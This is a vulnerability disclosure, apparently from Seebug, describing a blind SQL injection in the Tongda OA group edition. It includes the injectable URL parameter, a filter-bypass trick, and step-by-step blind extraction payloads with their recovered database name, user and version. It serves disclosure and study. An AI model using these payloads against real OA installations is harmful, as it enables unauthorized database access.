通达OA集团最新版一处盲注漏洞demo测试(需登录)

2015-10-20T00:00:00
ID SSV:96127
Type seebug
Reporter Root
Modified 2015-10-20T00:00:00

Description

简要描述:

集团OA最新版,未过滤',然后再绕过过滤函数,root权限

详细说明:

厂商官网:http://.../ 集团demo地址:.../ SQL漏洞地址:

**.**.**.**/general/document/index.php/send/sendlist/send_for/?tid=&title=1 参数title可注入

这个点竟然没有过滤单引号'

<img src="https://images.seebug.org/upload/201510/19183301f5727cc2440b462979be90d3f57056d2.png" alt="1019-20.png" width="600" onerror="javascript:errimg(this);">

爆SQL语句: 提交:

**.**.**.**/general/document/index.php/send/sendlist/send_for/?tid=&title=1%' and 1=2 union select

<img src="https://images.seebug.org/upload/201510/19183439bd3193c3663c2c818b37301dceff7a90.png" alt="1019-21.png" width="600" onerror="javascript:errimg(this);">

返回:

不安全的SQL语句:联合查询 select count(*) as total from doc_send_data as a where 1 = 1 and title like '%1%' and 1=2 union select%' and status='6' and a.creator='admin'

然后绕过过滤,构造注入

**.**.**.**/general/document/index.php/send/sendlist/send_for/?tid=&title=1%' and length(version())=41 and 'a%'='a

<img src="https://images.seebug.org/upload/201510/19183649c375a7ed001b5496615dc50dc5e49ea7.png" alt="1019-22.png" width="600" onerror="javascript:errimg(this);">

判断version长度为41 同理判断user、database

**.**.**.**/general/document/index.php/send/sendlist/send_for/?tid=&title=1%' and length(database())=5 and 'a%'='a

**.**.**.**/general/document/index.php/send/sendlist/send_for/?tid=&title=1%' and length(user())=14 and 'a%'='a

构造盲注点:

**.**.**.**/general/document/index.php/send/sendlist/send_for/?tid=&title=1%' and CONV(HEX(SUBSTRING(database(),1,1)),16,10)=116 and 'a%'='a

直接用脚本跑:

**.**.**.**/general/document/index.php/send/sendlist/send_for/?tid=&title=1%' and CONV(HEX(SUBSTRING(database(),{1},1)),16,10)={1} and 'a%'='a

<img src="https://images.seebug.org/upload/201510/191837437a4cd43b4126a0bbbb71f4825436ca90.png" alt="1015-database.png" width="600" onerror="javascript:errimg(this);">

database

td_oa

<img src="https://images.seebug.org/upload/201510/191837517ee20a1cbd85ffde73d6e8b3f92288b1.png" alt="1015-user.png" width="600" onerror="javascript:errimg(this);">

user

root@**.**.**.**

<img src="https://images.seebug.org/upload/201510/191837553275b5c88c22cdc1aa467d9e6ec97f2a.png" alt="1015-version.png" width="600" onerror="javascript:errimg(this);">

version

5.5.36-enterprise-commercial-advanced-log

漏洞证明:

<img src="https://images.seebug.org/upload/201510/191837437a4cd43b4126a0bbbb71f4825436ca90.png" alt="1015-database.png" width="600" onerror="javascript:errimg(this);">

database

td_oa

<img src="https://images.seebug.org/upload/201510/191837517ee20a1cbd85ffde73d6e8b3f92288b1.png" alt="1015-user.png" width="600" onerror="javascript:errimg(this);">

user

root@**.**.**.**

<img src="https://images.seebug.org/upload/201510/191837553275b5c88c22cdc1aa467d9e6ec97f2a.png" alt="1015-version.png" width="600" onerror="javascript:errimg(this);">

version

5.5.36-enterprise-commercial-advanced-log